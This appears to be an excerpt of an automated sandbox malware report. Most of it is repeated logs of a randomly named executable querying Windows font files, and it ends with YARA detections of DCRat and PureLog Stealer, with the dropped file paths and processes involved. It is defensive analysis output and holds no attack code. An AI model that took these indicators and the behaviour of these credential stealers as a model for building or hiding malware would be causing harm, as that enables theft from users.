                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeQueries volume information: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe VolumeInformation
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeQueries volume information: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe VolumeInformation
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe VolumeInformation
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe VolumeInformation
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeQueries volume information: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe VolumeInformation
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe VolumeInformation
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_008BDF1E
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008AB146 GetVersionExW,0_2_008AB146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000015.00000002.2906400363.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000015.00000002.2906400363.0000000002606000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000002.1924266865.000000001306B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: bridgeportDhcpcommon.exe PID: 6288, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe PID: 180, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe PID: 6232, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: 544WP3NHaP.exe, type: SAMPLE
                                    Source: Yara matchFile source: 5.0.bridgeportDhcpcommon.exe.a10000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.544WP3NHaP.exe.62f96e5.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.544WP3NHaP.exe.6c096e5.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.544WP3NHaP.exe.62f96e5.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.544WP3NHaP.exe.6c096e5.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000005.00000000.1870378712.0000000000A12000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
